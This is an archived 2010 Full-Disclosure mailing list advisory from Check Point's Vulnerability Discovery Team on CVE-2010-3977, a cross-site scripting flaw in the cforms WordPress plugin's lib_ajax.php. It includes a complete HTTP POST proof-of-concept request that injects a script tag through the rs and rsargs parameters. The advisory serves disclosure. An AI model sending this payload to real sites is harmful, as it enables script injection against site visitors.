'[Full-disclosure] cforms WordPress Plugin Cross Site Scripting'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] cforms WordPress Plugin Cross Site Scripting
From:       Rodrigo Branco <rbranco () checkpoint ! com>
Date:       2010-10-30 15:13:48
Message-ID: 50D13E31158CB84E8421A703294682FB1422508C6E () USEXCHANGE ! ad ! checkpoint ! com
[Download RAW message or body]

Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following \
vulnerability.



Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

cforms WordPress Plugin Cross Site Scripting Vulnerability
CVE-2010-3977


INTRODUCTION

According to Delicious Days, "cforms is a powerful and feature rich form plugin for WordPress, \
offering convenient deployment of multiple Ajax  driven contact forms throughout your blog or \
even on the same page."

This problem was confirmed in the following versions of the cforms WordPress Plugin, other \
versions  maybe also affected.

cforms v11.5


CVSS Scoring System

The CVSS score is: 5.5
	Base Score: 6.7
	Temporal Score: 5.5
We used the following values to calculate the scores:
	Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
	Temporal score is: E:F/RL:OF/RC:C


DETAILS

A data array is created in lib_ajax.php using values from a form field in a POST request.  The \
parameters rs and rsargs are not validated and thus it is possible to inject code.

Request:
http://<server>/wp-content/plugins/cforms/lib_ajax.php
POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = \
t e s t  ; comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://
www.checkpoint.com$#$<script>alert(1)</script>



CREDITS

This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security \
company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the \
Check Point Vulnerability Discovery Team (VDT).




Best Regards,
 
Rodrigo.
 
--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic